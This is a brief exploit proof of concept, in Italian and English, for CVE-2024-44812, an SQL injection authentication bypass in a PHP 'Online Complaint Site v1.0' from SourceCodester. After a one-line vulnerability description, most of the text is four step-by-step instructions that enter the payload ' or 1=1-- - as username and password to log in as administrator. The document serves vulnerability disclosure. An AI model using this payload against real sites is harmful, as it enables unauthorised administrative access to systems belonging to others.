
Exploit Proof of Concept per CVE-2024-44812 - Vulnerabilità di bypass dell'autenticazione tramite SQL injection in Online Complaint Site v1.0
SourceCodester
https://www.sourcecodester.com/php/14717/online-complaint-site-using-phpmysqli-full-source-code.html
La vulnerabilità di SQL Injection nel sito Online Complaint Site v.1.0 consente a un attaccante remoto di elevare i privilegi tramite i parametri username e password nel componente /admin.index.php.
Exploit proof-of-concept per CVE-2024-44812 - Vulnerabilità di bypass dell'autenticazione tramite SQL Injection nel sito Online Complaint Site v1.0
Step 1 – Visit http://localhost/complaintsite/
Step 2 – Click on "admin" button and redirect on login page.
Step 3 – Enter username as ' or 1=1-- - and password as ' or 1=1-- -
Step 4 – Click Login and now you will be logged in as admin.